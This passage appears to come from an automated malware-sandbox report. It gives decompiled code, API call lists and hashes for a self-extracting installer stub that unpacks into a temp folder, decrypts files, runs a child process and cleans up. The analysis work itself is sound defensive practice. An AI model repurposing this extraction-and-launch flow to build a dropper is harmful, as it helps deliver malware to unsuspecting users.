                                                                                                                                                                                                      							E00E744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0xe79124 = E00E76285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0xe79a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00E7621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0xe78a24;
                                                                                                                                                                                                      				if( *0xe78a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E00E73A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00E751E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0xe78a38;
                                                                                                                                                                                                      				if( *0xe78a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E72F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00E72FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00E72FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 00E72FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E72FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7301C
                                                                                                                                                                                                        • Part of subcall function 00E751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E72F4D,?,00000002,00000000), ref: 00E75201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-3123416969
                                                                                                                                                                                                      • Opcode ID: 495585a9aa76333b78929b8efbbcca7643b270fed13fd6690244106f0d4129cb
                                                                                                                                                                                                      • Instruction ID: 7fcc508cc24ceea8ba44f5a0a2456c9f9c4c47647ed172b139aebabc7d1a1b9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 495585a9aa76333b78929b8efbbcca7643b270fed13fd6690244106f0d4129cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0411A30A012058EDBB4EB329D4965A33F89B54758F10E075E90DF2192EF74CEC5DA51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00E75467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0xe791e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00E71680(0xe791e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E00E758C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E00E76CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E00E7597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0xe78a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0xe78a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0xe79124 = E00E76285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe78a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E00E753A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0xe791e4;
                                                                                                                                                                                                      				E00E71781(0xe791e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0xe79a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00E7658A(_t48, 0x104, 0xe71140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E00E7658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E754C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7556F
                                                                                                                                                                                                        • Part of subcall function 00E753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E753FB
                                                                                                                                                                                                        • Part of subcall function 00E753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75402
                                                                                                                                                                                                        • Part of subcall function 00E753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7541F
                                                                                                                                                                                                        • Part of subcall function 00E753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7542B
                                                                                                                                                                                                        • Part of subcall function 00E753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-3703068183
                                                                                                                                                                                                      • Opcode ID: d6e3fed9c20e5ba5fcbd767cc350e8486d4645ff308ecef5ca872a0e64f194cc
                                                                                                                                                                                                      • Instruction ID: d39dbde33166f5f78f0610cd2aebde66c57e1e2112ddb3787a9a4b8e6744f436
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e3fed9c20e5ba5fcbd767cc350e8486d4645ff308ecef5ca872a0e64f194cc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA310872B00B056BCB14DB3AAD455BE779BABC1308B04E17AA40EB2591DBF08E458691
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00E72390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E00E76CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E71680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E00E716B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E00E71680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E00E716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E00E716B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E00E7658A( &_v280, 0x104, 0xe71140);
                                                                                                                                                                                                      								E00E72390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,00E78A3A,00E711F4,00E78A3A,00000000,?,?), ref: 00E723F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00E711F8), ref: 00E72427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00E711FC), ref: 00E7243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00E72495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00E724A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00E724AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00E724BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(00E78A3A), ref: 00E724C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: a616d0dd21c816589ed987e20e80283b21deb47e0e9a77e180ebed7b1073a5e6
                                                                                                                                                                                                      • Instruction ID: af5c98771183e0f43ff9a9fbb1fb7a8dc045fdffc3e45aaeb43839d875bd8a0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a616d0dd21c816589ed987e20e80283b21deb47e0e9a77e180ebed7b1073a5e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF3172316057409FD320EBA8DC89AEF73ECABC4315F04993DB65DA6290EB34994DC752
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 675 e73fef-e74010 676 e74016-e7403b CreateProcessA 675->676 677 e7410a-e7411a call e76ce0 675->677 678 e740c4-e74101 call e76285 GetLastError FormatMessageA call e744b9 676->678 679 e74041-e7406e WaitForSingleObject GetExitCodeProcess 676->679 691 e74106 678->691 681 e74091 call e7411b 679->681 682 e74070-e74077 679->682 689 e74096-e740b8 CloseHandle * 2 681->689 682->681 685 e74079-e7407b 682->685 685->681 688 e7407d-e74089 685->688 688->681 692 e7408b 688->692 693 e740ba-e740c0 689->693 694 e74108 689->694 691->694 692->681 693->694 695 e740c2 693->695 694->677 695->691
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E00E73FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E00E76CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E00E744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0xe78a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0xe79a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0xe79a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E7411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0xe79a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00E74033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E74049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 00E7405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E7409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E740A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E740DC
                                                                                                                                                                                                      • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00E740E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      • Opcode ID: 7a27ee505cf18b896c01517a4508aaa2dc8832f402016fef6ed4038d55d7b755
                                                                                                                                                                                                      • Instruction ID: 96cd5e350243b2fe66a89abbd2abac0a658f8c705193938e3a69ac53884bf664
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a27ee505cf18b896c01517a4508aaa2dc8832f402016fef6ed4038d55d7b755
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71317EB1642218AFEB219B66DC49FAA77B8EBD4705F1091A9F50DF21A1C7304DC9CA21
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E00E72BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0xe7a288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0xe79124 = 0;
                                                                                                                                                                                                      				if(E00E72CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E00E72F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E00E752B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0xe78a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0xe79a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E00E71F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0xe78588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0xe79124; // 0x80070002
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00E76BB0,00E70000,00000000,00000002,0000000A), ref: 00E72C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00E76BB0,00E70000,00000000,00000002,0000000A), ref: 00E72C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00E72C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00E76BB0,00E70000,00000000,00000002,0000000A), ref: 00E72C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
